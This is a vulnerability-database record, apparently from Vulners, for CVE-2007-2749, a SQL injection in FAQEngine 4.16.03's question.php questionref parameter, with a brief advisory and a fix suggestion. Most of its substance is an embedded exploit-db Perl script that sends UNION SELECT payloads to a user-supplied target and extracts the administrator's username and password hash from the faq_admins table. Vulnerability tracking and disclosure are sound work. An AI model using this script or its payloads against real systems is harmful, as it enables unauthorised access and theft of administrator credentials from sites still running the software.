ID OSVDB:36091
Type osvdb
Reporter OSVDB
Modified 2007-05-16T07:18:54
Description
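No description provided by the source. The CVE-2007-2749 entry referenced below describes this as a SQL injection in question.php of FAQEngine 4.16.03 and earlier, reachable by remote attackers through the questionref parameter in a display action.
Note: the CVSS vector on this record rates confidentiality impact as NONE, but the referenced proof of concept retrieves an admin username and password hash, so affected installs should be treated as a credential-disclosure risk. The quoted query interpolates questionref unquoted into the SQL string; the remedy is to cast it to an integer or bind it as a query parameter.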
References:
Secunia Advisory ID: 25297
Other Advisory URL: http://milw0rm.com/exploits/3943
ISS X-Force ID: 34355
CVE-2007-2749
Bugtraq ID: 24032
{"href": "https://vulners.com/osvdb/OSVDB:36091", "history": [], "id": "OSVDB:36091", "reporter": "OSVDB", "published": "2007-05-16T07:18:54", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25297](https://secuniaresearch.flexerasoftware.com/advisories/25297/)\nOther Advisory URL: http://milw0rm.com/exploits/3943\nISS X-Force ID: 34355\n[CVE-2007-2749](https://vulners.com/cve/CVE-2007-2749)\nBugtraq ID: 24032\n", "title": "FAQEngine question.php questionref Variable SQL Injection", "lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "hash": "59171d7ce15aa9747851de2065aa0ec6734219ab9a45240643ffee253d8d1ca9", "references": [], "edition": 1, "cvelist": ["CVE-2007-2749"], "affectedSoftware": [], "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2749"]}, {"type": "exploitdb", "idList": ["EDB-ID:3943"]}], "modified": "2017-04-28T13:20:32"}, "vulnersScore": 6.9}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "bc1d72460062e7d0be8f537293a8e35b"}, {"key": "cvss", "hash": "26769fd423968d45be7383413e2552f1"}, {"key": "description", "hash": "7a60ffc9ff77c8cc60384e8cc244a951"}, {"key": "href", "hash": "140aa954f3b046b76f296e937a5360b6"}, {"key": "modified", "hash": "09c51791a3e1e031fba843c1e2dd7cf7"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "09c51791a3e1e031fba843c1e2dd7cf7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "118499ef294994d0059fe3593efdc59d"}, {"key": "type", "hash": 
"1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-05-16T07:18:54"}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in question.php in FAQEngine 4.16.03 and earlier allows remote attackers to execute arbitrary SQL commands via the questionref parameter in a display action.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2749", "published": "2007-05-17T20:30:00", "title": "CVE-2007-2749", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T19:40:12", "bulletinFamily": "exploit", "description": "FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit. CVE-2007-2749. Webapps exploit for php platform", "modified": "2007-05-16T00:00:00", "published": "2007-05-16T00:00:00", "id": "EDB-ID:3943", "href": "https://www.exploit-db.com/exploits/3943/", "type": "exploitdb", "title": "FAQEngine <= 4.16.03 question.php questionref SQL Injection Exploit", "sourceData": "#!/usr/bin/perl -w\n\n#################################################################################\n#\t\t\t\t\t\t\t\t\t\t#\n#\t FAQEngine <= v4.16.03 SQL Injection Exploit\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# Discovered by: Silentz\t\t\t\t\t\t\t#\n# Payload: Admin Username & Hash Retrieval\t\t\t\t\t#\n# Website: http://www.w4ck1ng.com\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t#\n# Vulnerable Code (question.php):\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# $sql = \"select * from \".$tableprefix.\"_questions where publish=1 \t#\n# and questionref=$questionref order by enterdate desc\";\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# PoC: question.php?mode=display&questionref=-999 UNION SELECT 0,0,0,0,\t\t#\n# username,password,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\t#\n# \t\t\t\t\t\t\t\t\t\t#\n# Subject To: The question display mode being enabled\t\t\t\t#\n# GoogleDork: Get your own!\t\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# Shoutz: The entire w4ck1ng 
community\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\nuse LWP::UserAgent;\n\nif (@ARGV < 1){\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \" FAQEngine <= v4.16.03 SQL Injection Exploit\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \"Usage: w4ck1ng_faqengine.pl [PATH]\\r\\n\\r\\n\";\nprint \"[PATH] = Path where FAQEngine is located\\r\\n\\r\\n\";\nprint \"e.g. w4ck1ng_faqengine.pl http://victim.com/faq/\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \" \t\t http://www.w4ck1ng.com\\r\\n\";\nprint \" \t\t ...Silentz\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nexit();\n}\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\n@paths = (\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\"\n);\n\nfor($i=0;$i<3;$i++){\n $host = $ARGV[0] . 
$paths[$i];\n $res = $b->request(HTTP::Request->new(GET=>$host));\n ($user) = $res->content =~ /\">([0-9a-zA-Z]+)<\\/span><\\/td><\\/tr>/;\n\n if($user){ last; }\n}\n\nif($user){\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \" FAQEngine <= v4.16.03 SQL Injection Exploit\\r\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \"[+] Admin User : $user\\n\";\n}\n\n\n@paths = (\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,password,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,password,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\"\n);\n\nfor($i=0;$i<3;$i++){\n $host = $ARGV[0] . $paths[$i];\n $res = $b->request(HTTP::Request->new(GET=>$host));\n ($hash) = $res->content =~ /([0-9a-fA-F]{32})/;\n if($hash){ last; }\n}\n\nif($hash){\n print \"[+] Admin Hash : $hash\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \" \t\t http://www.w4ck1ng.com\\r\\n\";\n print \" \t\t ...Silentz\\r\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n} else {\n print \"\\nExploit Failed...\\n\";\n}\n\n# milw0rm.com [2007-05-16]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3943/"}]}